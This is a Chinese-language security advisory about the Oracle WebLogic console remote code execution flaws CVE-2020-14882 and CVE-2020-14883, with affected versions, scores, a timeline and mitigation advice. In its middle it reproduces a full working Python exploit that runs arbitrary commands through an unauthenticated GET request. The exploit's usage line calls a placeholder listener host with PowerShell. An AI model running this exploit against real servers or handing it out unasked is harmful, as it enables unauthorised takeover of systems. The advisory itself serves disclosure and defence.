【更新】CVE-2020-14882 | WebLogic远程代码执行漏洞通告
发布时间 2020-10-300x00 漏洞概述
CNVD ID | CVE-2020-14882 | 时 间 | 2020-10-30 |
类 型 | RCE | 等 级 | 高危 |
远程利用 | 是 | 影响范围 |
WebLogic Server是美国Oracle公司的主要产品之一,其主要用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用,是商业市场上主要的Java(J2EE)应用服务器软件之一。
0x01 漏洞详情

2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。
2020年10月29日, Oracle发布的漏洞补丁CVE-2020-14882存在可绕过的0day漏洞。即在Weblogic补丁更新完成后,攻击者仍可绕过WebLogic后台登录等限制,并控制Weblogic服务器。造成的风险和危害极大。漏洞详情如下:
漏洞编号 | 产品 | 组件 | 评分 | 影响范围 |
CVE-2020-14882 | Oracle WebLogic Server | Console | 9.8 | 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 |
CVE-2020-14883 | Oracle WebLogic Server | Console | 7.2 | 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0 |
相关EXP如下:
#!/usr/bin/python3
# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request
# Exploit Author: Nguyen Jang
# CVE: CVE-2020-14882
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html
# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
import requests
import sys
from urllib3.exceptions import InsecureRequestWarning
if len(sys.argv) != 3:
print("[+] WebLogic Unauthenticated RCE via GET request")
print("[+] Usage : python3 exploit.py http(s)://target:7001 command")
print("[+] Example1 : python3 exploit.py http(s)://target:7001 \"nslookup your_Domain\"")
print("[+] Example2 : python3 exploit.py http(s)://target:7001 \"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\"")
exit()
target = sys.argv[1]
command = sys.argv[2]
request = requests.session()
headers = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'}
print("[+] Sending GET Request ....")
GET_Request = request.get(target + "/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"java.lang.Runtime.getRuntime().exec('" + command + "');\");", verify=False, headers=headers)
print("[+] Done !!")
0x02 处置建议
临时措施:
由于该漏洞的补丁存在被绕过的风险,建议临时关闭后台/console/console.portal对外访问。
0x03 参考链接
https://www.oracle.com/security-alerts/cpuoct2020.html
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14882
https://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html
0x04 时间线
2020-10-20 Oracle发布安全公告
2020-10-21 VSRC发布十月补丁更新安全通告
2020-10-28 漏洞POC被公开
2020-10-29 漏洞补丁被暴露存在绕过0day
2020-10-30 VSRC发布安全通告
0x05 附录
CVSS评分标准官网:http://www.first.org/cvss/



京公网安备11010802024551号